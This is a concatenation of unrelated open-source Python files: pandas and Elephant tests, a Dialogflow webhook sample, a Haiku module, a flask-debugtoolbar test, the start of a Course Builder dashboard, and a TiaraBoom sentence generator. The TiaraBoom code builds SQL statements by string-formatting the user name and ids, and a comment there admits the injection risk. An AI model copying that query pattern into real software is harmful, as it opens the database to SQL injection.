"id": "a400cc66126034f4ba1868bda6bd52c31da80cf5",
"size": "1583",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ml_pipeline_gen/templates/xgboost_inputs.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2104"
},
{
"name": "Jupyter Notebook",
"bytes": "5880"
},
{
"name": "Python",
"bytes": "99482"
},
{
"name": "Shell",
"bytes": "6738"
}
],
"symlink_target": ""
} |
"""Test extension array for storing nested data in a pandas container.
The JSONArray stores lists of dictionaries. The storage mechanism is a list,
not an ndarray.
Note:
We currently store lists of UserDicts (Py3 only). Pandas has a few places
internally that specifically check for dicts, and does non-scalar things
in that case. We *want* the dictionaries to be treated as scalars, so we
hack around pandas by using UserDicts.
"""
import collections
import itertools
import numbers
import random
import string
import sys
import numpy as np
from pandas.core.dtypes.base import ExtensionDtype
from pandas import compat
from pandas.core.arrays import ExtensionArray
class JSONDtype(ExtensionDtype):
type = compat.Mapping
name = 'json'
try:
na_value = collections.UserDict()
except AttributeError:
# source compatibility with Py2.
na_value = {}
@classmethod
def construct_array_type(cls):
"""Return the array type associated with this dtype
Returns
-------
type
"""
return JSONArray
@classmethod
def construct_from_string(cls, string):
if string == cls.name:
return cls()
else:
raise TypeError("Cannot construct a '{}' from "
"'{}'".format(cls, string))
class JSONArray(ExtensionArray):
dtype = JSONDtype()
__array_priority__ = 1000
def __init__(self, values, dtype=None, copy=False):
for val in values:
if not isinstance(val, self.dtype.type):
raise TypeError("All values must be of type " +
str(self.dtype.type))
self.data = values
# Some aliases for common attribute names to ensure pandas supports
# these
self._items = self._data = self.data
# those aliases are currently not working due to assumptions
# in internal code (GH-20735)
# self._values = self.values = self.data
@classmethod
def _from_sequence(cls, scalars, dtype=None, copy=False):
return cls(scalars)
@classmethod
def _from_factorized(cls, values, original):
return cls([collections.UserDict(x) for x in values if x != ()])
def __getitem__(self, item):
if isinstance(item, numbers.Integral):
return self.data[item]
elif isinstance(item, np.ndarray) and item.dtype == 'bool':
return self._from_sequence([x for x, m in zip(self, item) if m])
elif isinstance(item, compat.Iterable):
# fancy indexing
return type(self)([self.data[i] for i in item])
else:
# slice
return type(self)(self.data[item])
def __setitem__(self, key, value):
if isinstance(key, numbers.Integral):
self.data[key] = value
else:
if not isinstance(value, (type(self),
compat.Sequence)):
# broadcast value
value = itertools.cycle([value])
if isinstance(key, np.ndarray) and key.dtype == 'bool':
# masking
for i, (k, v) in enumerate(zip(key, value)):
if k:
assert isinstance(v, self.dtype.type)
self.data[i] = v
else:
for k, v in zip(key, value):
assert isinstance(v, self.dtype.type)
self.data[k] = v
def __len__(self):
return len(self.data)
@property
def nbytes(self):
return sys.getsizeof(self.data)
def isna(self):
return np.array([x == self.dtype.na_value for x in self.data],
dtype=bool)
def take(self, indexer, allow_fill=False, fill_value=None):
# re-implement here, since NumPy has trouble setting
# sized objects like UserDicts into scalar slots of
# an ndarary.
indexer = np.asarray(indexer)
msg = ("Index is out of bounds or cannot do a "
"non-empty take from an empty array.")
if allow_fill:
if fill_value is None:
fill_value = self.dtype.na_value
# bounds check
if (indexer < -1).any():
raise ValueError
try:
output = [self.data[loc] if loc != -1 else fill_value
for loc in indexer]
except IndexError:
raise IndexError(msg)
else:
try:
output = [self.data[loc] for loc in indexer]
except IndexError:
raise IndexError(msg)
return self._from_sequence(output)
def copy(self, deep=False):
return type(self)(self.data[:])
def astype(self, dtype, copy=True):
# NumPy has issues when all the dicts are the same length.
# np.array([UserDict(...), UserDict(...)]) fails,
# but np.array([{...}, {...}]) works, so cast.
# needed to add this check for the Series constructor
if isinstance(dtype, type(self.dtype)) and dtype == self.dtype:
if copy:
return self.copy()
return self
return np.array([dict(x) for x in self], dtype=dtype, copy=copy)
def unique(self):
# Parent method doesn't work since np.array will try to infer
# a 2-dim object.
return type(self)([
dict(x) for x in list({tuple(d.items()) for d in self.data})
])
@classmethod
def _concat_same_type(cls, to_concat):
data = list(itertools.chain.from_iterable([x.data for x in to_concat]))
return cls(data)
def _values_for_factorize(self):
frozen = self._values_for_argsort()
if len(frozen) == 0:
# _factorize_array expects 1-d array, this is a len-0 2-d array.
frozen = frozen.ravel()
return frozen, ()
def _values_for_argsort(self):
# Disable NumPy's shape inference by including an empty tuple...
# If all the elemnts of self are the same size P, NumPy will
# cast them to an (N, P) array, instead of an (N,) array of tuples.
frozen = [()] + [tuple(x.items()) for x in self]
return np.array(frozen, dtype=object)[1:]
def make_data():
# TODO: Use a regular dict. See _NDFrameIndexer._setitem_with_indexer
return [collections.UserDict([
(random.choice(string.ascii_letters), random.randint(0, 100))
for _ in range(random.randint(0, 10))]) for _ in range(100)]
| {
"content_hash": "505e79f030b647fb1b893d6bae2a1a11",
"timestamp": "",
"source": "github",
"line_count": 199,
"max_line_length": 79,
"avg_line_length": 33.06532663316583,
"alnum_prop": 0.5737082066869301,
"repo_name": "GuessWhoSamFoo/pandas",
"id": "10fd21f89c5641b7e73e7bef609b3938d932230d",
"size": "6580",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pandas/tests/extension/json/array.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "4879"
},
{
"name": "C",
"bytes": "406353"
},
{
"name": "C++",
"bytes": "17193"
},
{
"name": "HTML",
"bytes": "606963"
},
{
"name": "Makefile",
"bytes": "556"
},
{
"name": "Python",
"bytes": "14926624"
},
{
"name": "Shell",
"bytes": "29351"
},
{
"name": "Smarty",
"bytes": "2040"
}
],
"symlink_target": ""
} |
""" handle_webhook will return the correct fullfilment response dependong the tag that is sent in the request"""
# [START dialogflow_cx_webhook]
# TODO(developer): change entry point to handle_webhook in cloud function
def handle_webhook(request):
req = request.get_json()
tag = req["fulfillmentInfo"]["tag"]
if tag == "Default Welcome Intent":
text = "Hello from a GCF Webhook"
elif tag == "get-name":
text = "My name is Flowhook"
else:
text = f"There are no fulfillment responses defined for {tag} tag"
# You can also use the google.cloud.dialogflowcx_v3.types.WebhookRequest protos instead of manually writing the json object
# Please see https://googleapis.dev/python/dialogflow/latest/dialogflow_v2/types.html?highlight=webhookresponse#google.cloud.dialogflow_v2.types.WebhookResponse for an overview
res = {
"fulfillment_response": {
"messages": [
{
"text": {
"text": [
text
]
}
}
]
}
}
# Returns json
return res
# [END dialogflow_cx_webhook]
| {
"content_hash": "e5e0b9eba86fdd564b4d8322a21ec9a8",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 180,
"avg_line_length": 30.375,
"alnum_prop": 0.5851851851851851,
"repo_name": "googleapis/python-dialogflow-cx",
"id": "516000cd45f6d19ff6eed65bb21529022c5cd393",
"size": "1788",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "samples/snippets/webhook.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "10904903"
},
{
"name": "Shell",
"bytes": "30681"
}
],
"symlink_target": ""
} |
"""Paddings."""
from haiku._src.pad import causal
from haiku._src.pad import create_from_padfn
from haiku._src.pad import create_from_tuple
from haiku._src.pad import full
from haiku._src.pad import is_padfn
from haiku._src.pad import PadFn
from haiku._src.pad import reverse_causal
from haiku._src.pad import same
from haiku._src.pad import valid
create = create_from_padfn # Legacy alias.
__all__ = (
"PadFn",
"causal",
"create",
"create_from_padfn",
"create_from_tuple",
"full",
"is_padfn",
"reverse_causal",
"same",
"valid",
)
| {
"content_hash": "3971a20b5c96fdb84870d0a2407d9d2f",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 44,
"avg_line_length": 22.115384615384617,
"alnum_prop": 0.671304347826087,
"repo_name": "deepmind/dm-haiku",
"id": "d2a84aaaf509b733cf96c77151b29b22a2bace90",
"size": "1308",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "haiku/pad.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1024855"
},
{
"name": "Shell",
"bytes": "1907"
},
{
"name": "Starlark",
"bytes": "31643"
}
],
"symlink_target": ""
} |
import random
try:
import nltk.data
except Exception as e:
print "cannot import nltk"
import copy
import client
try:
import corenlp
except Exception as e:
print "cannot import corenlp"
import time
from unidecode import unidecode
import database
import rewrite_rules as rr
import depend_tree as deptree
class SentenceBuilderErr:
def __init__(self, err):
self.err = err
def __str__(self):
return "SentenceBuilderErr(%s)" % self.err
class ExpansionNode:
def __init__(self, word, arctype, sid, did, height, fixed_sib):
self.word = word
self.arctype = arctype
self.sid = sid
self.did = did
self.height = height
self.fixed_siblings = fixed_sib
def __str__(self):
return "ExpansionNode(word = %s, arctype = %s, sid = %s, did = %s, height = %s, fixed_sibling = %s)" % (self.word, self.arctype, self.sid, self.did, self.height, self.fixed_siblings)
HEIGHT_THROTTLER = 1.0
ARC_WILDNESS = {
"amod" : 0.5,
# "num" : 0.5,
"iobj" : 0.5,
"dobj" : 0.5,
# "vmod" : 0.5,
# "rcmod" : 0.2,
# "pobj" : 0.5,
# "quantmod" : 0.5,
"nsubj" : 0.5,
# "nsubjpass" : 0.5,
# "csubj" : 0.25,
# "number" : 0.5
}
DEFAULT_PARAMS = {
"height_throttler" : HEIGHT_THROTTLER,
"arc_wildness" : ARC_WILDNESS
}
NLP = None
def InitNLP():
global NLP
if NLP is None:
NLP = client.StanfordNLP()
def Print(x):
print x
def Test(sentence, verbose=False, transforms=[], exempt=[]):
print sentence
global NLP
InitNLP()
dt = deptree.ToDependTree(NLP.parse(sentence)["sentences"][0]["dependencies"],"ROOT-0")
print dt
result = deptree.FromDependTree(copy.deepcopy(dt),verbose=verbose,printres=True)
assert result == sentence.strip(".").strip("!"), "\n%s\n%s" % (result,sentence)
for arc,tg in transforms:
if arc in exempt:
continue
dtcopy = copy.deepcopy(dt)
if dtcopy.Transform(arc,tg):
result = deptree.FromDependTree(dtcopy,verbose=verbose,printres=False)
Test(result, verbose=verbose)
print
def Reset(con, user):
con.query("drop table %s_dependencies" % user)
con.query("drop table %s_sentences" % user)
con.query("drop table %s_procd" % user)
DDL(con,user)
def DDL(con, user):
con.query("use tiaraboom")
con.query(("create table if not exists %s_dependencies"
"(sentence_id bigint not null"
",arctype varbinary(255) not null"
",governor varbinary(255) not null"
",dependant varbinary(255) not null"
",governor_id int not null"
",dependant_id int not null"
",primary key(sentence_id,dependant_id)"
")") % user)
con.query(("create table if not exists %s_procd"
"(sentence_id bigint not null"
",arctype varbinary(255) not null"
",governor varbinary(255) not null"
",dependant varbinary(255) not null"
",governor_id int not null"
",dependant_id int not null"
",primary key(sentence_id,dependant_id)"
",shard(sentence_id)"
",key(arctype, governor, dependant)"
")") % user)
con.query(("create table if not exists %s_sentences"
"(id bigint primary key auto_increment"
",sentence blob"
",source blob default null)") % user)
def UpdateProcd(con, user):
con.query("drop table %s_procd" % user)
DDL(con, user)
ids = [int(r["id"]) for r in con.query("select id from %s_sentences" % user)]
for i in xrange(len(ids)):
if i % 100 == 0:
print "%f%% done" % (100*float(i)/len(ids))
ix = ids[i]
PostProcessSentence(con, ix, user)
def PostProcessSentence(con, i, user):
procd = deptree.FlattenDependTree(deptree.PreProcessDependTree(SentenceIdDependTree(user,i, con)))
if len(procd) == 0:
return
q = "insert into %s_procd values" % user
params = []
for p in procd:
q += "(%d, '%s', %%s, %%s, %d, %d)," % (i, p[0], p[2], p[4])
params.append(p[1])
params.append(p[3])
q = q.strip(",")
try:
con.query(q, *params)
except Exception as e:
print q
print params
print i
raise e
def InsertSentence(con, user, sentence):
# if you SQL inject me I'll urinate on you
sentence = sentence.encode("utf8")
global NLP
print sentence
if NLP is None:
InitNLP()
nlp_parsed = NLP.parse(sentence.decode("utf8").encode("ascii","ignore"))
depsa = nlp_parsed["sentences"]
ProcessDependencies(con, user, depsa)
def ProcessDependencies(con, user, depsa, source=None, log=Print):
for deps in depsa:
txt = deps["text"].encode("utf8")
try:
if source is None:
sid = str(con.execute("insert into %s_sentences(sentence) values(%%s)" % (user), txt))
else:
sid = str(con.execute("insert into %s_sentences(sentence,source) values(%%s,%%s)" % (user), txt, unidecode(source)))
except Exception as e:
log("insert sentence error " + str(e))
continue
deps = deps["dependencies"]
failed = False
for at, gv, dp in deps:
values = [sid, "'%s'" % at, "%s", "%s", deptree.remove_word(gv), deptree.remove_word(dp)]
q = "insert into %s_dependencies values (%s)" % (user,",".join(values))
try:
con.query(q.encode("utf8"),
deptree.remove_id(gv).lower().encode("utf8"),
deptree.remove_id(dp).lower().encode("utf8"))
except Exception as e:
log("insert dep error " + str(e))
log("%s %s %s" % (q.encode("utf8"),
deptree.remove_id(gv).lower().encode("utf8"),
deptree.remove_id(dp).lower().encode("utf8")))
con.query("delete from %s_sentences where id = %s" % (user,sid))
con.query("delete from %s_dependencies where sentence_id = %s" % (user,sid))
failed = True
break
if not failed:
PostProcessSentence(con, int(sid), user)
def Ingest(con, text, user):
tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')
texts = tokenizer.tokenize(text.decode("utf8"))
for sentence in texts:
InsertSentence(con, user, sentence)
def IngestFile(con, filename, user, log=Print):
result = corenlp.ParseAndSaveFile(filename)
log("begin xact")
con.query("begin")
try:
ProcessDependencies(con, user, result["sentences"], filename, log=log)
log("commit xact")
con.query("commit")
except Exception:
con.query("rollback")
raise
def RandomWeightedChoice(choices):
total = sum(w for c, w in choices)
r = random.uniform(0, total)
upto = 0
for c,w in choices:
if upto + w > r:
return c
upto += w
assert False, ("RandomWeightedChoice",choices)
def Subset(superset,subset):
for elem in set(subset):
if superset.count(elem) < subset.count(elem):
return False
return True
# this function find a all sentences containing a given word under a given arctype
# for each fixed sibling, the toplevel arctype will be present.
# the return type is [([(arctype, word)], sentence_id, dependant_id)]
#
def HistogramSubsets(con, node, user):
word = node.word
parent_arctype = node.arctype
fixed_siblings = node.fixed_siblings
subs = ("select dl.sentence_id as sid, dl.dependant_id as did, "
"group_concat(dr.arctype separator '___') as gc_arc, "
"group_concat(dr.dependant separator '___') as gc_dep, "
"count(dr.dependant) as groupsize "
"from %s_procd dl left join %s_procd dr "
"on dl.sentence_id = dr.sentence_id and dl.dependant_id = dr.governor_id "
"where dl.dependant = %%s %s "
"group by dl.sentence_id, dl.dependant_id ")
extra_cond = ""
params = [word]
if not parent_arctype is None:
extra_cond += ("and dl.arctype = '%s'" % parent_arctype)
subs = subs % (user, user, extra_cond)
q = subs
t0 = time.time()
qres = con.query(q, *params)
maxgroupsize = max([int(r["groupsize"]) for r in qres])
if maxgroupsize == 0:
qres = [qres[0]]
t1 = time.time()
hists = [( ([] if r["gc_arc"] is None else r["gc_arc"].split("___")),
([] if r["gc_dep"] is None else r["gc_dep"].split("___")),
r["sid"],
r["did"])
for r in qres]
disallowed = ["cc"]
disallowed.extend(["num","number"]) # this will add some stability for now...
if len(hists) == 0:
raise SentenceBuilderErr("before filtering no rows")
result = []
assert fixed_siblings.data is None
fixed_tups = [(fs[0], fs[1].data) for fs in fixed_siblings.children]
t2 = time.time()
for h in hists:
assert len(h[0]) == len(h[1]), h
if len([x for x in h[0] if x in disallowed]) == 0 and len([x for x in h[0] if x == "nsubj"]) < 2:
zipd = zip(h[0],h[1])
if Subset(zipd, fixed_tups):
result.append((zipd, h[2], h[3]))
return result
# returns [(arctype, word, fixed_arcs)]
def SubsetSelector(con, node, user, dbg_out, symbols):
if 'facts' not in dbg_out:
dbg_out['facts'] = []
params = DEFAULT_PARAMS
hist = HistogramSubsets(con, node=node, user=user)
if len(hist) == 0:
raise SentenceBuilderErr("generated no rows, word = %s, \nfixed=%s" % (node.word, str(node.fixed_siblings)))
for i in xrange(len(hist)):
denom = float(len(hist[i][0])) if node.height == 0 else (params["height_throttler"] * float(node.height))**len(hist[i][0])
hist[i] = (hist[i], 0 if denom == 0 else (1.0/denom))
for s,k in symbols.iteritems():
if s in [hr[1] for hr in hist[i][0][0]]:
dbg_out['facts'].append("Bumped %s by %f" % (s,4+k))
hist[i] = (hist[i][0], hist[i][1]*(4+k))
result_entry = RandomWeightedChoice(hist)
q = "select * from %s_procd where sentence_id = %s and governor_id = %s" % (user, result_entry[1], result_entry[2])
result = [ExpansionNode(r["dependant"],
r["arctype"],
r["sentence_id"],
r["dependant_id"],
node.height+1,
deptree.DependTree(None))
for r in con.query(q)]
assert sorted([(r.arctype,r.word) for r in result]) == sorted(result_entry[0]), "%s\n%s\n%s\n%s" % (result,result_entry)
if "used_list" not in dbg_out:
dbg_out["used_list"] = []
if len(result) != 0:
dbg_out["used_list"].append(int(result_entry[1]))
fixed_ixs = set([])
for at,fs in node.fixed_siblings.children:
found = False
for i in xrange(len(result)):
if (result[i].arctype,result[i].dependant) == (at,fs.data):
fixed_ixs.add(i)
result[i].fixed_sibling = deptree.DependTree(None, fs.children)
found = True
break
assert found, ("not found",at,fs.data,result)
for i in xrange(len(result)):
if result[i].arctype in params["arc_wildness"] and random.random() < params["arc_wildness"][result[i].arctype]:
if i not in fixed_ixs:
next_word = RandomDependant(con, user, node.word, result[i].arctype, symbols=symbols)
dbg_out['facts'].append(result[i].word +"->"+next_word)
result[i].word = next_word
if result[i].word in symbols:
del symbols[result[i].word]
return result
def GetDependants(con, user, sentence_id, gov_id):
q = "select arctype, dependant from %s_procd where governor_id = %%s and sentence_id = %%s" % user
return [(a["arctype"], a["dependant"]) for a in con.query(q,gov_id, sentence_id)]
def RandomDependant(con, user, gov, arctype, symbols={}):
q = "select dependant from %s_procd where governor = %%s and arctype = %%s" % user
dependants = [d['dependant'] for d in con.query(q,gov,arctype)]
for sym,rate in symbols.iteritems():
if sym in dependants:
dependants.append(sym)
dependants.append(sym)
for x in xrange(int(rate)):
dependants.append(sym)
return random.choice(dependants)
def Expand(con, node, user, dbg_out, symbols):
arctypes = SubsetSelector(con, node, user=user, dbg_out = dbg_out, symbols=symbols)
outs = []
for nextnode in arctypes:
outs.append((nextnode.arctype, Expand(con, node=nextnode, user=user, symbols=symbols, dbg_out=dbg_out)))
return deptree.DependTree(node.word, outs, node.sid, node.did)
# SeekToRoot :: dependant -> fixed_tree
def SeekToRoot(con, user, dependant):
result = []
q = (("select governor, arctype from %s_procd "
"where dependant = %%s"))
q = q % user
rows = con.query(q,dependant.encode("utf8"))
if len(rows) == 0:
return deptree.DependTree(None)
row = random.choice(rows)
result.append((row["arctype"],dependant))
dependant = row['governor']
while dependant != 'root':
q = (("select sentence_id as sid, governor_id as gid from %s_procd "
"where arctype = '%s' and governor = %%s and dependant = %%s"))
q = q % (user, result[-1][0])
rows = con.query(q, dependant, result[-1][1])
assert len(rows) != 0
row = random.choice(rows)
rows = con.query("select governor, arctype from %s_procd where sentence_id = %s and dependant_id = %s" % (user, row["sid"], row["gid"]))
assert len(rows) == 1, ("SeekToRoot",rows)
result.append((rows[0]['arctype'], dependant))
dependant = rows[0]['governor']
result_tree = []
for at, dep in result:
result_tree = [(at, deptree.DependTree(dep, result_tree))]
assert result_tree[0][0] == 'root', ("SeekToRoot",result_tree)
return result_tree[0][1]
g_last_generated = None
def Generate(con, user, using=None, dbg_out={}, symbols={}):
if not using is None:
fixed_chain = SeekToRoot(con, user, using)
if fixed_chain.data is None:
return None
word = fixed_chain.data
fixed_chain.data = None
else:
fixed_chain = deptree.DependTree(None)
word = random.choice(con.query("select dependant from %s_procd where arctype = 'root'" % user))['dependant']
global g_last_generated
node = ExpansionNode(word, 'root', -1, -1, 0, fixed_chain)
result = Expand(con, node=node, user=user, dbg_out=dbg_out, symbols=symbols)
g_last_generated = copy.deepcopy(result)
return result
def GenerateAndExpand(user, using=None):
con = database.ConnectToMySQL()
con.query("use tiaraboom")
dbg_out = { "used_list" : [] }
result = deptree.FromDependTree(Generate(con, user, using=using,dbg_out=dbg_out))
print "sentences_used" , dbg_out["used_list"]
print "facts" , dbg_out["facts"]
print g_last_generated
return result
def GenerateWithSymbols(con, user, symbols, requireSymbols=False):
symbols = { k.encode("utf8") : v for k,v in symbols.iteritems() }
while len(symbols) != 0:
using = RandomWeightedChoice(symbols.items())
del symbols[using]
dbg_out = { "used_list" : [] }
result = Generate(con, user, using, symbols=copy.copy(symbols), dbg_out=dbg_out)
print dbg_out["facts"]
if not result is None:
return result, using
if requireSymbols:
raise Exception("cannot build sentence with provided symbols")
result = Generate(con, user, None)
return result, None
def SentenceIdDependTree(user,sid, con):
rows = con.query("select arctype, governor, dependant, governor_id, dependant_id from %s_dependencies where sentence_id = %d" % (user,sid))
deps = [(r["arctype"], r['governor'] + "-" + r['governor_id'], r['dependant'] + "-" + r['dependant_id']) for r in rows]
return deptree.ToDependTree(deps, root='root-0')
def PrintSentences(user,sids):
for s in sids:
PrintSentence(user,s)
def PrintSentence(user,sid):
con = database.ConnectToMySQL()
con.query("use tiaraboom")
print con.query("select * from %s_sentences where id = %d" % (user,sid))[0]['sentence']
print SentenceIdDependTree(user,sid, con)
def GetImportantWords(parsetree, nlp):
root = parsetree.Child(parsetree.Find("root"))
result = { root.data : 1 }
nsubj = root.FindNoCheck("nsubj")
if not nsubj is None:
if not root.ChildStr(nsubj) in result:
result[root.ChildStr(nsubj)] = 0
result[root.ChildStr(nsubj)]+= 3
dobj = root.FindNoCheck("dobj")
if not dobj is None:
if not root.ChildStr(dobj) in result:
result[root.ChildStr(dobj)] = 0
result[root.ChildStr(dobj)]+= 3
for w,mw in nlp["words"]:
if mw["NamedEntityTag"] != 'O':
if not w in result:
result[w] = 0
result[w]+= 10
return result
if __name__ == "__main__":
TestAll()
| {
"content_hash": "9645a4ea083c415cfb6f21cbcf537747",
"timestamp": "",
"source": "github",
"line_count": 457,
"max_line_length": 190,
"avg_line_length": 38.29978118161926,
"alnum_prop": 0.5772153345140832,
"repo_name": "jvictor0/TiaraBoom",
"id": "c0b329239fdeeda3a0d990e5a48384274c545410",
"size": "17503",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "artrat/sentence_builder.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "155700"
},
{
"name": "HTML",
"bytes": "2378"
},
{
"name": "Haskell",
"bytes": "9532"
},
{
"name": "JavaScript",
"bytes": "4915"
},
{
"name": "Python",
"bytes": "424135"
}
],
"symlink_target": ""
} |
"""
Unit tests for the waveform_feature module.
:copyright: Copyright 2014-2020 by the Elephant team, see `doc/authors.rst`.
:license: Modified BSD, see LICENSE.txt for details.
"""
from __future__ import division
import unittest
import numpy as np
import quantities as pq
from numpy.testing import assert_array_almost_equal
from elephant import waveform_features
class WaveformWidthTestCase(unittest.TestCase):
def setUp(self):
self.waveform = [29., 42., 41., 18., 24., 28., 34., 34., 9.,
-31., -100., -145., -125., -88., -48., -18., 14., 36.,
30., 33., -4., -25., -3., 30., 51., 47., 70.,
76., 78., 57., 53., 49., 22., 15., 88., 109.,
79., 68.]
self.target_width = 24
def test_list(self):
width = waveform_features.waveform_width(self.waveform)
self.assertEqual(width, self.target_width)
def test_np_array(self):
waveform = np.asarray(self.waveform)
width = waveform_features.waveform_width(waveform)
self.assertEqual(width, self.target_width)
def test_pq_quantity(self):
waveform = np.asarray(self.waveform) * pq.mV
width = waveform_features.waveform_width(waveform)
self.assertEqual(width, self.target_width)
def test_np_array_2d(self):
waveform = np.asarray(self.waveform)
waveform = np.vstack([waveform, waveform])
self.assertRaises(ValueError, waveform_features.waveform_width,
waveform)
def test_empty_list(self):
self.assertRaises(ValueError, waveform_features.waveform_width, [])
def test_cutoff(self):
size = 10
waveform = np.arange(size, dtype=float)
for cutoff in (-1, 1):
# outside of [0, 1) range
self.assertRaises(ValueError, waveform_features.waveform_width,
waveform, cutoff=cutoff)
for cutoff in np.linspace(0., 1., num=size, endpoint=False):
width = waveform_features.waveform_width(waveform, cutoff=cutoff)
self.assertEqual(width, size - 1)
class WaveformSignalToNoiseRatioTestCase(unittest.TestCase):
def test_zero_waveforms(self):
zero_waveforms = [np.zeros((5, 10)),
np.zeros((5, 1, 10)),
np.zeros((5, 3, 10))]
for zero_wf in zero_waveforms:
with self.assertWarns(UserWarning):
# expect np.nan result when waveform noise is zero.
result = waveform_features.waveform_snr(zero_wf)
self.assertTrue(np.all(np.isnan(result)))
def test_waveforms_arange_single_spiketrain(self):
target_snr = 0.9
waveforms = np.arange(20).reshape((2, 1, 10))
snr_float = waveform_features.waveform_snr(waveforms)
self.assertIsInstance(snr_float, float)
self.assertEqual(snr_float, target_snr)
self.assertEqual(waveform_features.waveform_snr(np.squeeze(waveforms)),
target_snr)
def test_waveforms_arange_multiple_spiketrains(self):
target_snr = [0.3, 0.3, 0.3]
waveforms = np.arange(60).reshape((2, 3, 10))
snr_arr = waveform_features.waveform_snr(waveforms)
self.assertIsInstance(snr_arr, np.ndarray)
assert_array_almost_equal(snr_arr, target_snr)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "58c6bacea7db94a3841d5eb737c12da7",
"timestamp": "",
"source": "github",
"line_count": 92,
"max_line_length": 79,
"avg_line_length": 37.380434782608695,
"alnum_prop": 0.6025007269555103,
"repo_name": "mdenker/elephant",
"id": "aff400afa2c20489c662401f21d0b6d4a941da69",
"size": "3439",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "elephant/test/test_waveform_features.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "11359"
},
{
"name": "C++",
"bytes": "92294"
},
{
"name": "Cuda",
"bytes": "21912"
},
{
"name": "Python",
"bytes": "1712932"
}
],
"symlink_target": ""
} |
import sys
import pytest
from flask_debugtoolbar import _printable
def load_app(name):
app = __import__(name).app
app.config['TESTING'] = True
return app.test_client()
def test_basic_app():
app = load_app('basic_app')
index = app.get('/')
assert index.status_code == 200
assert b'<div id="flDebug"' in index.data
@pytest.mark.skipif(sys.version_info >= (3,),
reason='test only applies to Python 2')
def test_printable_unicode():
class UnicodeRepr(object):
def __repr__(self):
return u'\uffff'
printable = _printable(UnicodeRepr())
assert "raised UnicodeEncodeError: 'ascii' codec" in printable
@pytest.mark.skipif(sys.version_info >= (3,),
reason='test only applies to Python 2')
def test_printable_non_ascii():
class NonAsciiRepr(object):
def __repr__(self):
return 'a\xffb'
printable = u'%s' % _printable(NonAsciiRepr())
# should replace \xff with the unicode ? character
assert printable == u'a\ufffdb'
| {
"content_hash": "94ffc04318f71eebdd166fa2c61f6787",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 66,
"avg_line_length": 25.70731707317073,
"alnum_prop": 0.6233396584440227,
"repo_name": "lepture/flask-debugtoolbar",
"id": "fd04ddc8f1b67461939b3b4019dadfcca2d54675",
"size": "1054",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "test/test_toolbar.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "11617"
},
{
"name": "JavaScript",
"bytes": "216298"
},
{
"name": "Makefile",
"bytes": "5741"
},
{
"name": "Python",
"bytes": "51944"
}
],
"symlink_target": ""
} |
"""Classes and methods to create and manage Courses."""
__author__ = 'Pavel Simakov (psimakov@google.com)'
import datetime
import os
import urllib
from common import jinja_filters
from common import safe_dom
from controllers import sites
from controllers.utils import ApplicationHandler
from controllers.utils import HUMAN_READABLE_TIME_FORMAT
from controllers.utils import ReflectiveRequestHandler
import jinja2
import jinja2.exceptions
from models import config
from models import courses
from models import custom_modules
from models import jobs
from models import roles
from models import transforms
from models import utils
from models import vfs
from models.models import Student
from models.models import ValidStudent
from models.models import StudentAnswersEntity
from course_settings import CourseSettingsHandler
from course_settings import CourseSettingsRESTHandler
import filer
from filer import AssetItemRESTHandler
from filer import AssetUriRESTHandler
from filer import FileManagerAndEditor
from filer import FilesItemRESTHandler
import messages
from peer_review import AssignmentManager
import unit_lesson_editor
from unit_lesson_editor import AssessmentRESTHandler
from unit_lesson_editor import ImportCourseRESTHandler
from unit_lesson_editor import LessonRESTHandler
from unit_lesson_editor import LinkRESTHandler
from unit_lesson_editor import UnitLessonEditor
from unit_lesson_editor import UnitLessonTitleRESTHandler
from unit_lesson_editor import UnitRESTHandler
from google.appengine.api import users
import logging
MODULE_QUESTIONS = [4,10,7,5,5,5,5,7,5,5,5,11,7]
class DashboardHandler(
CourseSettingsHandler, FileManagerAndEditor, UnitLessonEditor,
AssignmentManager, ApplicationHandler, ReflectiveRequestHandler):
"""Handles all pages and actions required for managing a course."""
default_action = 'outline'
get_actions = [
default_action, 'assets', 'settings', 'analytics',
'edit_basic_settings', 'edit_settings', 'edit_unit_lesson',
'edit_unit', 'edit_link', 'edit_lesson', 'edit_assessment',
'add_asset', 'delete_asset', 'import_course', 'edit_assignment']
# Requests to these handlers automatically go through an XSRF token check
# that is implemented in ReflectiveRequestHandler.
post_actions = [
'compute_student_stats', 'create_or_edit_settings', 'add_unit',
'add_link', 'add_assessment', 'add_lesson',
'edit_basic_course_settings', 'add_reviewer', 'delete_reviewer']
@classmethod
def get_child_routes(cls):
"""Add child handlers for REST."""
return [
(AssessmentRESTHandler.URI, AssessmentRESTHandler),
(AssetItemRESTHandler.URI, AssetItemRESTHandler),
(CourseSettingsRESTHandler.URI, CourseSettingsRESTHandler),
(FilesItemRESTHandler.URI, FilesItemRESTHandler),
(AssetItemRESTHandler.URI, AssetItemRESTHandler),
(AssetUriRESTHandler.URI, AssetUriRESTHandler),
(ImportCourseRESTHandler.URI, ImportCourseRESTHandler),
(LessonRESTHandler.URI, LessonRESTHandler),
(LinkRESTHandler.URI, LinkRESTHandler),
(UnitLessonTitleRESTHandler.URI, UnitLessonTitleRESTHandler),
(UnitRESTHandler.URI, UnitRESTHandler),
]
def can_view(self):
"""Checks if current user has viewing rights."""
return roles.Roles.is_course_admin(self.app_context)
def can_edit(self):
"""Checks if current user has editing rights."""
